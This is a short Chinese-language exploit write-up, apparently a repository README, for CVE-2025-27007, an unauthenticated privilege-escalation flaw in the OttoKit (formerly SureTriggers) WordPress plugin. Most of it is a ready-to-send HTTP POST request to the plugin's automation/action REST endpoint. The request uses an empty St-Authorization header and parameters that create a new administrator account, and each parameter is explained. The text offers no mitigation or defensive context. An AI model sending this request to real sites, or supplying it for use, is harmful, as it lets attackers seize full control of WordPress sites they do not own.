利用 CVE-2025-27007,这是 OttoKit(原名 SureTriggers)WordPress 插件中的一个严重的未经身份验证的权限提升漏洞。
对 CVE-2025-27007 的利用,这是 OttoKit 插件(原名 SureTriggers)中一个严重的未授权权限提升漏洞,针对 WordPress。本仓库概述了攻击者如何在易受攻击的 WordPress 站点上创建管理员账户。
该漏洞可在以下情况下被利用:
以下请求针对 /wp-json/sure-triggers/v1/automation/action 端点创建管理员账户:
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]
selected_options[user_name]=new_admin&selected_options[user_email][email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists
端点:POST /wp-json/sure-triggers/v1/automation/action
St-Authorization: (空):当插件未配置时绕过身份验证。
selected_options[user_name]:新账户的用户名(例如 new_admin)。
selected_options[user_email]:新账户的电子邮件(例如 [email protected])。
selected_options[password]:新账户的密码(例如 StrongP@ssw0rd123)。
selected_options[role]:设置为 administrator 以授予完全权限。
type_event:设置为 create_user_if_not_exists 以触发用户创建。